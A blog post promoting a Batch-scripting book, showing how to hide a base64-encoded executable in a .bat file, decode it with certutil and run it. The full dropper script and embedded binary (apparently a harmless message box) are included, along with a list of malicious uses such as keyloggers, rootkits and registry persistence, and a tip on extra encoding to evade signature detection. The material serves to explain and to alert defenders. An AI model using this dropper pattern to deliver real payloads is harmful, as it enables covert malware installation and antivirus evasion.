Batchography: Embedding an executable file in a Batch script

batchography-good-resIn this blog post, I am going to share with you a recipe from the Batchography book that illustrates and explains in details how to embed executable files in the Batch file script and execute them after they are dropped.

This technique does not rely on using a polyglot Batch file where its first part is actually a Batch script and the other part is a VBS or JScript script. If you want to learn more about how to write polyglot Batch scripts, please refer to Chapter 4 in the Batchography book.

flower separator

Get the book from Amazon: the print editionbtn-buy-on-amazonor the e-book editionbtn-buy-on-amazon

flower separator

There are so many reasons as to why you may want to embed one or more executable files in a Batch file script, but unfortunately, like a double-edged sword, you can do good stuff or bad stuff with this technique:

  • Embed a small downloader stub: the embedded executable is a small remote installer that downloads the remainder of the setup files to the system.
  • Embed a driver file: the embedded executable is a driver file. This can be a very dangerous driver (such as rootkit) or an innocent useful driver (such as a printer driver). The Batch script may use built-in commands such as PNPUTIL.EXE to install the driver.
  • Embed an executable that has an escalation of privilege exploit: the embedded executable exploits a bug in the operating system and grants the Batch file SYSTEM or Administrative privileges thus allowing the Batch file to do more damage to the system.
  • Embed a malicious program: the embedded file could be a key logger software. The Batch file drops the key logger and then creates an auto-start extensibility point (ASEP) using the REG.EXE command for example, or even installs the malware as a system service (SC.EXE).
  • Embed various binary files: the Batch script could act like a self-extracting archive (SFX). When executed, it unpacks various embedded files to the system.

I am not encouraging you to use this technique for malicious purposes, instead I am drawing your attention to the potential harm that can be achieved using the Batch scripting language alone. If you are a security product vendor, you may want to improve your product’s signatures and behavior monitor logic.

Let’s get to it

The idea behind embedding one or more executables (or any other binary file) in the Batch script is to be able to decode text into binary data using the Batch script. One way to do that is to rely on the certutil.exe built-in utility that allows us to base64-encode the executable file into textual format. The Batch script can then pick up the embedded base64 text, decode it to a temporary executable file, execute the file then delete it.

Here’s how the script would look like:

@echo off
:: 
:: The Batchography book by Elias Bachaalany
::

  setlocal enabledelayedexpansion

  set FN=%TEMP%\evil.tmp
  call :extract-embedded-bin "%FN%"
  start %FN%
  goto :eof


:extract-embedded-bin <1=OutFileName>
  setlocal

  set MBEGIN=-1
  for /f "useback tokens=1 delims=: " %%a in (`findstr /B /N /C:"-----BEGIN CERTIFICATE-----" "%~f0"`) DO (
    set /a MBEGIN=%%a-1
  )

  if "%MBEGIN%"=="-1" (
    endlocal
    exit /b -1
  )

  :: Delete previous output files
  if exist "%~1.tmp" del "%~1.tmp"
  if exist "%~1" del "%~1"  

  for /f "useback skip=%MBEGIN% tokens=* delims=" %%a in ("%~f0") DO (
    
    :: ##A
    echo %%a >>"%~1.tmp"
  )

  certutil -decode "%~1.tmp" "%~1" >nul 2>&1
  del "%~1.tmp"

  endlocal
  exit /b 0


-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABdXG3BGT0Dkhk9A5IZPQOS
lyIQkh49A5LlHRGSGD0DklJpY2gZPQOSAAAAAAAAAABQRQAATAEBALL6QFcAAAAA
AAAAAOAADwELAQUMAAIAAAAAAAAAAAAAEBAAAAAQAAAAIAAAAABAAAAQAAAAAgAA
BAAAAAAAAAAEAAAAAAAAAAAgAAAAAgAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAA
AAAAABAAAAAAAAAAAAAAAGwQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA
7gAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAAGAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSEAAAAAAAALgQAAAAAAAA
6zJEcm9wcGVkIGV4ZWN1dGFibGUATGV0J3MgZG8gbW9yZSBldmlsIHN0dWZmLCBu
b3QhAGoAaBIQQABoJRBAAGoA6AcAAABqAOgGAAAA/yUIEEAA/yUAEEAAzMywEAAA
AAAAAAAAAADGEAAACBAAAKgQAAAAAAAAAAAAAOAQAAAAEAAAAAAAAAAAAAAAAAAA
AAAAAAAAAADSEAAAAAAAALgQAAAAAAAAsQFNZXNzYWdlQm94QQB1c2VyMzIuZGxs
AACbAEV4aXRQcm9jZXNzAGtlcm5lbDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA==
-----END CERTIFICATE-----

That was one way of doing it. Malicious malware writers can even employ further encoding on top of the base64 encoding (at code site ##A) to evade signature based detection. As the Batchography book explains, doing this in the Batch language is not hard at all!

The example above drops a harmless 1kb executable file:

not-so-evil-batch
Embedding executables inside Batch files

And finally, always remember:

“WITH GREAT POWER THERE MUST ALSO COME – – GREAT RESPONSIBILITY!”

— Œuvres de Voltaire, Volume 48

flower separatorYou might also like:

 

Leave a Reply